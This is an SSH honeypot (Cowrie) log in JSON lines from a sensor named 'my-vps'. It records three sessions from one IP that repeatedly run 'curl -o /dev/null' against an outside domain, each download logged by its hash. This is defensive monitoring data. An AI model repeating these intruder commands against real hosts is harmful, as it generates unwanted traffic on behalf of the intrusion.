{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.614545Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.617013Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.618044Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.618726Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.620394Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.621325Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.624583Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.627927Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.628348Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.675888Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.676824Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.679780Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.681189Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.684629Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.687274Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.688375Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.729033Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.729511Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.731579Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.732879Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.737235Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.739483Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.740066Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.779565Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.781582Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.784063Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.785047Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.785666Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.787904Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.788548Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.791046Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.793668Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.796070Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.798601Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.800066Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.800767Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.803810Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.810101Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.837201Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.840432Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.843143Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.843896Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.850302Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.850970Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.852064Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.852441Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.856012Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.861093Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.887142Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.888347Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.889215Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.901258Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.903689Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.904359Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.907702Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.908457Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.933735Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.935568Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.937843Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.938430Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.944584Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.948210Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.948798Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.951436Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.952807Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.976604Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.978236Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.978883Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.992813Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.993716Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.995068Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.995783Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.019167Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.022432Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.023075Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.045398Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.046076Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.059429Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.060091Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.077999Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.078491Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.083394Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.084971Z","src_ip":"212.227.125.160","session":"9f264c568782"}
